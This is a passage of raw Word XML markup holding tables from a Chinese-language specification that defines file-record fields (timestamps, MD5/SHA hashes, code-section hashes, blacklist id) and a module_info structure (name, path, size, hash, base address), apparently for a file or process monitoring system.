        <w:tc>
          <w:tcPr>
            <w:tcW w:w="0" w:type="auto"/>
          </w:tcPr>
          <w:p w14:paraId="773E3D44" w14:textId="77777777" w:rsidR="00BC669E" w:rsidRDefault="00BC669E" w:rsidP="005C4BFD">
            <w:r>
              <w:t>32/64/空 表示 32位文件，64位文件，空未知</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr w:rsidR="00BC669E" w14:paraId="53C050BF" w14:textId="77777777" w:rsidTr="005C4BFD">
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="0" w:type="auto"/>
          </w:tcPr>
          <w:p w14:paraId="78249C4D" w14:textId="77777777" w:rsidR="00BC669E" w:rsidRDefault="00BC669E" w:rsidP="005C4BFD">
            <w:proofErr w:type="spellStart"/>
            <w:r>
              <w:t>f_ctime</w:t>
            </w:r>
            <w:proofErr w:type="spellEnd"/>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="0" w:type="auto"/>
          </w:tcPr>
          <w:p w14:paraId="2F8D2851" w14:textId="77777777" w:rsidR="00BC669E" w:rsidRDefault="00BC669E" w:rsidP="005C4BFD">
            <w:r>
              <w:t>Integer</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="0" w:type="auto"/>
          </w:tcPr>
          <w:p w14:paraId="55506618" w14:textId="77777777" w:rsidR="00BC669E" w:rsidRDefault="00BC669E" w:rsidP="005C4BFD">
            <w:proofErr w:type="gramStart"/>
            <w:r>
              <w:t>int(</w:t>
            </w:r>
            <w:proofErr w:type="gramEnd"/>
            <w:r>
              <w:t>10)</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="0" w:type="auto"/>
          </w:tcPr>
          <w:p w14:paraId="0869892E" w14:textId="77777777" w:rsidR="00BC669E" w:rsidRDefault="00BC669E" w:rsidP="005C4BFD">
            <w:r>
              <w:t>文件create time</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr w:rsidR="00BC669E" w14:paraId="3F3217F9" w14:textId="77777777" w:rsidTr="005C4BFD">
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="0" w:type="auto"/>
          </w:tcPr>
          <w:p w14:paraId="13E6A195" w14:textId="77777777" w:rsidR="00BC669E" w:rsidRDefault="00BC669E" w:rsidP="005C4BFD">
            <w:proofErr w:type="spellStart"/>
            <w:r>
              <w:t>f_mtime</w:t>
            </w:r>
            <w:proofErr w:type="spellEnd"/>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="0" w:type="auto"/>
          </w:tcPr>
          <w:p w14:paraId="11D17DB7" w14:textId="77777777" w:rsidR="00BC669E" w:rsidRDefault="00BC669E" w:rsidP="005C4BFD">
            <w:r>
              <w:t>Integer</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="0" w:type="auto"/>
          </w:tcPr>
          <w:p w14:paraId="2CD08BE1" w14:textId="77777777" w:rsidR="00BC669E" w:rsidRDefault="00BC669E" w:rsidP="005C4BFD">
            <w:proofErr w:type="gramStart"/>
            <w:r>
              <w:t>int(</w:t>
            </w:r>
            <w:proofErr w:type="gramEnd"/>
            <w:r>
              <w:t>10)</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="0" w:type="auto"/>
          </w:tcPr>
          <w:p w14:paraId="57930BA2" w14:textId="77777777" w:rsidR="00BC669E" w:rsidRDefault="00BC669E" w:rsidP="005C4BFD">
            <w:r>
              <w:t>文件modify time</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr w:rsidR="00BC669E" w14:paraId="64BF3049" w14:textId="77777777" w:rsidTr="005C4BFD">
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="0" w:type="auto"/>
          </w:tcPr>
          <w:p w14:paraId="7FCE884A" w14:textId="77777777" w:rsidR="00BC669E" w:rsidRDefault="00BC669E" w:rsidP="005C4BFD">
            <w:proofErr w:type="spellStart"/>
            <w:r>
              <w:t>f_atime</w:t>
            </w:r>
            <w:proofErr w:type="spellEnd"/>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="0" w:type="auto"/>
          </w:tcPr>
          <w:p w14:paraId="314F811C" w14:textId="77777777" w:rsidR="00BC669E" w:rsidRDefault="00BC669E" w:rsidP="005C4BFD">
            <w:r>
              <w:t>Integer</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="0" w:type="auto"/>
          </w:tcPr>
          <w:p w14:paraId="5218DD52" w14:textId="77777777" w:rsidR="00BC669E" w:rsidRDefault="00BC669E" w:rsidP="005C4BFD">
            <w:proofErr w:type="gramStart"/>
            <w:r>
              <w:t>int(</w:t>
            </w:r>
            <w:proofErr w:type="gramEnd"/>
            <w:r>
              <w:t>10)</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="0" w:type="auto"/>
          </w:tcPr>
          <w:p w14:paraId="1EEF7DF0" w14:textId="77777777" w:rsidR="00BC669E" w:rsidRDefault="00BC669E" w:rsidP="005C4BFD">
            <w:r>
              <w:t>文件access time</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr w:rsidR="00BC669E" w14:paraId="04D5D7A7" w14:textId="77777777" w:rsidTr="005C4BFD">
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="0" w:type="auto"/>
          </w:tcPr>
          <w:p w14:paraId="15AC4108" w14:textId="77777777" w:rsidR="00BC669E" w:rsidRDefault="00BC669E" w:rsidP="005C4BFD">
            <w:r>
              <w:t>md5</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="0" w:type="auto"/>
          </w:tcPr>
          <w:p w14:paraId="0C478196" w14:textId="77777777" w:rsidR="00BC669E" w:rsidRDefault="00BC669E" w:rsidP="005C4BFD">
            <w:r>
              <w:t>String</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="0" w:type="auto"/>
          </w:tcPr>
          <w:p w14:paraId="2E431B61" w14:textId="77777777" w:rsidR="00BC669E" w:rsidRDefault="00BC669E" w:rsidP="005C4BFD">
            <w:proofErr w:type="gramStart"/>
            <w:r>
              <w:t>varchar(</w:t>
            </w:r>
            <w:proofErr w:type="gramEnd"/>
            <w:r>
              <w:t>50)</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="0" w:type="auto"/>
          </w:tcPr>
          <w:p w14:paraId="5F7E2171" w14:textId="77777777" w:rsidR="00BC669E" w:rsidRDefault="00BC669E" w:rsidP="005C4BFD">
            <w:r>
              <w:t>全文md5</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr w:rsidR="00BC669E" w14:paraId="403B89E9" w14:textId="77777777" w:rsidTr="005C4BFD">
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="0" w:type="auto"/>
          </w:tcPr>
          <w:p w14:paraId="1ABECEDA" w14:textId="77777777" w:rsidR="00BC669E" w:rsidRDefault="00BC669E" w:rsidP="005C4BFD">
            <w:r>
              <w:t>sha1</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="0" w:type="auto"/>
          </w:tcPr>
          <w:p w14:paraId="251248FB" w14:textId="77777777" w:rsidR="00BC669E" w:rsidRDefault="00BC669E" w:rsidP="005C4BFD">
            <w:r>
              <w:t>String</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="0" w:type="auto"/>
          </w:tcPr>
          <w:p w14:paraId="4986791C" w14:textId="77777777" w:rsidR="00BC669E" w:rsidRDefault="00BC669E" w:rsidP="005C4BFD">
            <w:proofErr w:type="gramStart"/>
            <w:r>
              <w:t>varchar(</w:t>
            </w:r>
            <w:proofErr w:type="gramEnd"/>
            <w:r>
              <w:t>50)</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="0" w:type="auto"/>
          </w:tcPr>
          <w:p w14:paraId="46E0FC4A" w14:textId="77777777" w:rsidR="00BC669E" w:rsidRDefault="00BC669E" w:rsidP="005C4BFD">
            <w:r>
              <w:t>全文sha1</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr w:rsidR="00BC669E" w14:paraId="091247D0" w14:textId="77777777" w:rsidTr="005C4BFD">
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="0" w:type="auto"/>
          </w:tcPr>
          <w:p w14:paraId="4726801E" w14:textId="77777777" w:rsidR="00BC669E" w:rsidRDefault="00BC669E" w:rsidP="005C4BFD">
            <w:r>
              <w:t>sha256</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="0" w:type="auto"/>
          </w:tcPr>
          <w:p w14:paraId="2B0DDBE3" w14:textId="77777777" w:rsidR="00BC669E" w:rsidRDefault="00BC669E" w:rsidP="005C4BFD">
            <w:r>
              <w:t>String</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="0" w:type="auto"/>
          </w:tcPr>
          <w:p w14:paraId="4DB956E6" w14:textId="77777777" w:rsidR="00BC669E" w:rsidRDefault="00BC669E" w:rsidP="005C4BFD">
            <w:proofErr w:type="gramStart"/>
            <w:r>
              <w:t>varchar(</w:t>
            </w:r>
            <w:proofErr w:type="gramEnd"/>
            <w:r>
              <w:t>50)</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="0" w:type="auto"/>
          </w:tcPr>
          <w:p w14:paraId="5A47A1AD" w14:textId="77777777" w:rsidR="00BC669E" w:rsidRDefault="00BC669E" w:rsidP="005C4BFD">
            <w:r>
              <w:t>全文sha256</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr w:rsidR="00BC669E" w14:paraId="6C923ECB" w14:textId="77777777" w:rsidTr="005C4BFD">
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="0" w:type="auto"/>
          </w:tcPr>
          <w:p w14:paraId="1D59A180" w14:textId="77777777" w:rsidR="00BC669E" w:rsidRDefault="00BC669E" w:rsidP="005C4BFD">
            <w:r>
              <w:t>code_section_md5</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="0" w:type="auto"/>
          </w:tcPr>
          <w:p w14:paraId="1295620D" w14:textId="77777777" w:rsidR="00BC669E" w:rsidRDefault="00BC669E" w:rsidP="005C4BFD">
            <w:r>
              <w:t>String</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="0" w:type="auto"/>
          </w:tcPr>
          <w:p w14:paraId="07DF4932" w14:textId="77777777" w:rsidR="00BC669E" w:rsidRDefault="00BC669E" w:rsidP="005C4BFD">
            <w:proofErr w:type="gramStart"/>
            <w:r>
              <w:t>varchar(</w:t>
            </w:r>
            <w:proofErr w:type="gramEnd"/>
            <w:r>
              <w:t>50)</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="0" w:type="auto"/>
          </w:tcPr>
          <w:p w14:paraId="1C07A6AF" w14:textId="77777777" w:rsidR="00BC669E" w:rsidRDefault="00BC669E" w:rsidP="005C4BFD">
            <w:r>
              <w:t>代码段MD5</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr w:rsidR="00BC669E" w14:paraId="57E93D5C" w14:textId="77777777" w:rsidTr="005C4BFD">
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="0" w:type="auto"/>
          </w:tcPr>
          <w:p w14:paraId="417FECEE" w14:textId="77777777" w:rsidR="00BC669E" w:rsidRDefault="00BC669E" w:rsidP="005C4BFD">
            <w:r>
              <w:t>code_section_sha1</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="0" w:type="auto"/>
          </w:tcPr>
          <w:p w14:paraId="63B1319D" w14:textId="77777777" w:rsidR="00BC669E" w:rsidRDefault="00BC669E" w:rsidP="005C4BFD">
            <w:r>
              <w:t>String</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="0" w:type="auto"/>
          </w:tcPr>
          <w:p w14:paraId="1FC934FF" w14:textId="77777777" w:rsidR="00BC669E" w:rsidRDefault="00BC669E" w:rsidP="005C4BFD">
            <w:proofErr w:type="gramStart"/>
            <w:r>
              <w:t>varchar(</w:t>
            </w:r>
            <w:proofErr w:type="gramEnd"/>
            <w:r>
              <w:t>50)</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="0" w:type="auto"/>
          </w:tcPr>
          <w:p w14:paraId="0502CFC4" w14:textId="77777777" w:rsidR="00BC669E" w:rsidRDefault="00BC669E" w:rsidP="005C4BFD">
            <w:r>
              <w:t>代码段sha1</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr w:rsidR="00BC669E" w14:paraId="356A3C7A" w14:textId="77777777" w:rsidTr="005C4BFD">
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="0" w:type="auto"/>
          </w:tcPr>
          <w:p w14:paraId="29E3E43D" w14:textId="77777777" w:rsidR="00BC669E" w:rsidRDefault="00BC669E" w:rsidP="005C4BFD">
            <w:r>
              <w:t>code_section_sha256</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="0" w:type="auto"/>
          </w:tcPr>
          <w:p w14:paraId="26B7CEA1" w14:textId="77777777" w:rsidR="00BC669E" w:rsidRDefault="00BC669E" w:rsidP="005C4BFD">
            <w:r>
              <w:t>String</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="0" w:type="auto"/>
          </w:tcPr>
          <w:p w14:paraId="747EC17D" w14:textId="77777777" w:rsidR="00BC669E" w:rsidRDefault="00BC669E" w:rsidP="005C4BFD">
            <w:proofErr w:type="gramStart"/>
            <w:r>
              <w:t>varchar(</w:t>
            </w:r>
            <w:proofErr w:type="gramEnd"/>
            <w:r>
              <w:t>50)</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="0" w:type="auto"/>
          </w:tcPr>
          <w:p w14:paraId="3DD1D1CB" w14:textId="77777777" w:rsidR="00BC669E" w:rsidRDefault="00BC669E" w:rsidP="005C4BFD">
            <w:r>
              <w:t>代码段sha256</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr w:rsidR="00BC669E" w14:paraId="1A817186" w14:textId="77777777" w:rsidTr="005C4BFD">
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="0" w:type="auto"/>
          </w:tcPr>
          <w:p w14:paraId="479EE518" w14:textId="77777777" w:rsidR="00BC669E" w:rsidRDefault="00BC669E" w:rsidP="005C4BFD">
            <w:proofErr w:type="spellStart"/>
            <w:r>
              <w:t>black_id</w:t>
            </w:r>
            <w:proofErr w:type="spellEnd"/>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="0" w:type="auto"/>
          </w:tcPr>
          <w:p w14:paraId="35C79C37" w14:textId="77777777" w:rsidR="00BC669E" w:rsidRDefault="00BC669E" w:rsidP="005C4BFD">
            <w:r>
              <w:t>Integer</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="0" w:type="auto"/>
          </w:tcPr>
          <w:p w14:paraId="45C0C34C" w14:textId="77777777" w:rsidR="00BC669E" w:rsidRDefault="00BC669E" w:rsidP="005C4BFD">
            <w:proofErr w:type="gramStart"/>
            <w:r>
              <w:t>int(</w:t>
            </w:r>
            <w:proofErr w:type="gramEnd"/>
            <w:r>
              <w:t>10)</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="0" w:type="auto"/>
          </w:tcPr>
          <w:p w14:paraId="0F1101DF" w14:textId="77777777" w:rsidR="00BC669E" w:rsidRDefault="00BC669E" w:rsidP="005C4BFD">
            <w:r>
              <w:t>黑名单id (默认0)</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
    </w:tbl>
    <w:p w14:paraId="72ECED48" w14:textId="77777777" w:rsidR="00BC669E" w:rsidRDefault="00BC669E">
      <w:pPr>
        <w:pStyle w:val="3"/>
      </w:pPr>
      <w:bookmarkStart w:id="491" w:name="_Toc115166318"/>
      <w:bookmarkStart w:id="492" w:name="moduleinfo数据结构"/>
      <w:bookmarkEnd w:id="490"/>
      <w:proofErr w:type="spellStart"/>
      <w:r>
        <w:t>module_info</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r>
        <w:t>数据结构</w:t>
      </w:r>
      <w:bookmarkEnd w:id="491"/>
    </w:p>
    <w:tbl>
      <w:tblPr>
        <w:tblStyle w:val="Table"/>
        <w:tblW w:w="0" w:type="auto"/>
        <w:tblLook w:val="0020" w:firstRow="1" w:lastRow="0" w:firstColumn="0" w:lastColumn="0" w:noHBand="0" w:noVBand="0"/>
      </w:tblPr>
      <w:tblGrid>
        <w:gridCol w:w="2248"/>
        <w:gridCol w:w="896"/>
        <w:gridCol w:w="1430"/>
        <w:gridCol w:w="5508"/>
      </w:tblGrid>
      <w:tr w:rsidR="00BC669E" w14:paraId="48FC92A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657C790" w14:textId="77777777" w:rsidR="00BC669E" w:rsidRDefault="00BC669E" w:rsidP="005C4BFD">
            <w:r>
              <w:rPr>
                <w:bCs/>
              </w:rPr>
              <w:t>字段</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="0" w:type="auto"/>
          </w:tcPr>
          <w:p w14:paraId="708FA212" w14:textId="77777777" w:rsidR="00BC669E" w:rsidRDefault="00BC669E" w:rsidP="005C4BFD">
            <w:r>
              <w:rPr>
                <w:bCs/>
              </w:rPr>
              <w:t>类型</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="0" w:type="auto"/>
          </w:tcPr>
          <w:p w14:paraId="514986AC" w14:textId="77777777" w:rsidR="00BC669E" w:rsidRDefault="00BC669E" w:rsidP="005C4BFD">
            <w:r>
              <w:rPr>
                <w:bCs/>
              </w:rPr>
              <w:t>建议长度</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="0" w:type="auto"/>
          </w:tcPr>
          <w:p w14:paraId="0CC05153" w14:textId="77777777" w:rsidR="00BC669E" w:rsidRDefault="00BC669E" w:rsidP="005C4BFD">
            <w:r>
              <w:rPr>
                <w:bCs/>
              </w:rPr>
              <w:t>说明</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr w:rsidR="00BC669E" w14:paraId="3A9B2488" w14:textId="77777777" w:rsidTr="005C4BFD">
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="0" w:type="auto"/>
          </w:tcPr>
          <w:p w14:paraId="1C92DEAC" w14:textId="77777777" w:rsidR="00BC669E" w:rsidRDefault="00BC669E" w:rsidP="005C4BFD">
            <w:proofErr w:type="spellStart"/>
            <w:r>
              <w:t>module_name</w:t>
            </w:r>
            <w:proofErr w:type="spellEnd"/>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="0" w:type="auto"/>
          </w:tcPr>
          <w:p w14:paraId="49752355" w14:textId="77777777" w:rsidR="00BC669E" w:rsidRDefault="00BC669E" w:rsidP="005C4BFD">
            <w:r>
              <w:t>String</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="0" w:type="auto"/>
          </w:tcPr>
          <w:p w14:paraId="2DD94C39" w14:textId="77777777" w:rsidR="00BC669E" w:rsidRDefault="00BC669E" w:rsidP="005C4BFD">
            <w:proofErr w:type="gramStart"/>
            <w:r>
              <w:t>varchar(</w:t>
            </w:r>
            <w:proofErr w:type="gramEnd"/>
            <w:r>
              <w:t>50)</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="0" w:type="auto"/>
          </w:tcPr>
          <w:p w14:paraId="044DE01B" w14:textId="77777777" w:rsidR="00BC669E" w:rsidRDefault="00BC669E" w:rsidP="005C4BFD">
            <w:r>
              <w:t>模块名</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr w:rsidR="00BC669E" w14:paraId="10CC3CEE" w14:textId="77777777" w:rsidTr="005C4BFD">
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="0" w:type="auto"/>
          </w:tcPr>
          <w:p w14:paraId="6CD53C23" w14:textId="77777777" w:rsidR="00BC669E" w:rsidRDefault="00BC669E" w:rsidP="005C4BFD">
            <w:proofErr w:type="spellStart"/>
            <w:r>
              <w:t>module_path</w:t>
            </w:r>
            <w:proofErr w:type="spellEnd"/>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="0" w:type="auto"/>
          </w:tcPr>
          <w:p w14:paraId="4B70F689" w14:textId="77777777" w:rsidR="00BC669E" w:rsidRDefault="00BC669E" w:rsidP="005C4BFD">
            <w:r>
              <w:t>String</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="0" w:type="auto"/>
          </w:tcPr>
          <w:p w14:paraId="47AECE4B" w14:textId="77777777" w:rsidR="00BC669E" w:rsidRDefault="00BC669E" w:rsidP="005C4BFD">
            <w:proofErr w:type="gramStart"/>
            <w:r>
              <w:t>varchar(</w:t>
            </w:r>
            <w:proofErr w:type="gramEnd"/>
            <w:r>
              <w:t>128)</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="0" w:type="auto"/>
          </w:tcPr>
          <w:p w14:paraId="182CFC00" w14:textId="77777777" w:rsidR="00BC669E" w:rsidRDefault="00BC669E" w:rsidP="005C4BFD">
            <w:r>
              <w:t>模块路径</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr w:rsidR="00BC669E" w14:paraId="6A676E21" w14:textId="77777777" w:rsidTr="005C4BFD">
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="0" w:type="auto"/>
          </w:tcPr>
          <w:p w14:paraId="064A4165" w14:textId="77777777" w:rsidR="00BC669E" w:rsidRDefault="00BC669E" w:rsidP="005C4BFD">
            <w:proofErr w:type="spellStart"/>
            <w:r>
              <w:lastRenderedPageBreak/>
              <w:t>module_size</w:t>
            </w:r>
            <w:proofErr w:type="spellEnd"/>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="0" w:type="auto"/>
          </w:tcPr>
          <w:p w14:paraId="69BB6561" w14:textId="77777777" w:rsidR="00BC669E" w:rsidRDefault="00BC669E" w:rsidP="005C4BFD">
            <w:r>
              <w:t>Integer</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="0" w:type="auto"/>
          </w:tcPr>
          <w:p w14:paraId="552D2217" w14:textId="77777777" w:rsidR="00BC669E" w:rsidRDefault="00BC669E" w:rsidP="005C4BFD">
            <w:proofErr w:type="gramStart"/>
            <w:r>
              <w:t>int(</w:t>
            </w:r>
            <w:proofErr w:type="gramEnd"/>
            <w:r>
              <w:t>15)</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="0" w:type="auto"/>
          </w:tcPr>
          <w:p w14:paraId="3F819CC1" w14:textId="77777777" w:rsidR="00BC669E" w:rsidRDefault="00BC669E" w:rsidP="005C4BFD">
            <w:r>
              <w:t>模块大小</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr w:rsidR="00BC669E" w14:paraId="52484FAA" w14:textId="77777777" w:rsidTr="005C4BFD">
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="0" w:type="auto"/>
          </w:tcPr>
          <w:p w14:paraId="1CF8D5E9" w14:textId="77777777" w:rsidR="00BC669E" w:rsidRDefault="00BC669E" w:rsidP="005C4BFD">
            <w:r>
              <w:t>module_md5</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="0" w:type="auto"/>
          </w:tcPr>
          <w:p w14:paraId="11331108" w14:textId="77777777" w:rsidR="00BC669E" w:rsidRDefault="00BC669E" w:rsidP="005C4BFD">
            <w:r>
              <w:t>String</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="0" w:type="auto"/>
          </w:tcPr>
          <w:p w14:paraId="6F211B06" w14:textId="77777777" w:rsidR="00BC669E" w:rsidRDefault="00BC669E" w:rsidP="005C4BFD">
            <w:proofErr w:type="gramStart"/>
            <w:r>
              <w:t>varchar(</w:t>
            </w:r>
            <w:proofErr w:type="gramEnd"/>
            <w:r>
              <w:t>20)</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="0" w:type="auto"/>
          </w:tcPr>
          <w:p w14:paraId="64169B15" w14:textId="77777777" w:rsidR="00BC669E" w:rsidRDefault="00BC669E" w:rsidP="005C4BFD">
            <w:r>
              <w:t>模块md5值</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr w:rsidR="00BC669E" w14:paraId="77E0E8AC" w14:textId="77777777" w:rsidTr="005C4BFD">
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="0" w:type="auto"/>
          </w:tcPr>
          <w:p w14:paraId="3B252132" w14:textId="77777777" w:rsidR="00BC669E" w:rsidRDefault="00BC669E" w:rsidP="005C4BFD">
            <w:proofErr w:type="spellStart"/>
            <w:r>
              <w:t>module_base</w:t>
            </w:r>
            <w:proofErr w:type="spellEnd"/>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="0" w:type="auto"/>
          </w:tcPr>
          <w:p w14:paraId="1A775F59" w14:textId="77777777" w:rsidR="00BC669E" w:rsidRDefault="00BC669E" w:rsidP="005C4BFD">
            <w:r>
              <w:t>Integer</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="0" w:type="auto"/>
          </w:tcPr>
          <w:p w14:paraId="7091872F" w14:textId="77777777" w:rsidR="00BC669E" w:rsidRDefault="00BC669E" w:rsidP="005C4BFD">
            <w:proofErr w:type="gramStart"/>
            <w:r>
              <w:t>int(</w:t>
            </w:r>
            <w:proofErr w:type="gramEnd"/>
            <w:r>
              <w:t>15)</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="0" w:type="auto"/>
          </w:tcPr>
          <w:p w14:paraId="19FC1C93" w14:textId="77777777" w:rsidR="00BC669E" w:rsidRDefault="00BC669E" w:rsidP="005C4BFD">
            <w:r>
              <w:t>模块基址</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr w:rsidR="00BC669E" w14:paraId="60419535" w14:textId="77777777" w:rsidTr="005C4BFD">
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="0" w:type="auto"/>
          </w:tcPr>
          <w:p w14:paraId="0A4B144F" w14:textId="77777777" w:rsidR="00BC669E" w:rsidRDefault="00BC669E" w:rsidP="005C4BFD">
            <w:proofErr w:type="spellStart"/>
            <w:r>
              <w:t>module_base_str</w:t>
            </w:r>
            <w:proofErr w:type="spellEnd"/>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="0" w:type="auto"/>
          </w:tcPr>
          <w:p w14:paraId="7D56DE0E" w14:textId="77777777" w:rsidR="00BC669E" w:rsidRDefault="00BC669E" w:rsidP="005C4BFD">
            <w:r>
              <w:t>String</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="0" w:type="auto"/>
          </w:tcPr>
          <w:p w14:paraId="0891CA9B" w14:textId="77777777" w:rsidR="00BC669E" w:rsidRDefault="00BC669E" w:rsidP="005C4BFD">
            <w:proofErr w:type="gramStart"/>
            <w:r>
              <w:t>varchar(</w:t>
            </w:r>
            <w:proofErr w:type="gramEnd"/>
            <w:r>
              <w:t>20)</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="0" w:type="auto"/>
          </w:tcPr>
          <w:p w14:paraId="5C16582D" w14:textId="77777777" w:rsidR="00BC669E" w:rsidRDefault="00BC669E" w:rsidP="005C4BFD">
            <w:r>
              <w:t>模块基址</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr w:rsidR="00BC669E" w14:paraId="4355342C" w14:textId="77777777" w:rsidTr="005C4BFD">
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="0" w:type="auto"/>
          </w:tcPr>
          <w:p w14:paraId="4F05EA72" w14:textId="77777777" w:rsidR="00BC669E" w:rsidRDefault="00BC669E" w:rsidP="005C4BFD">
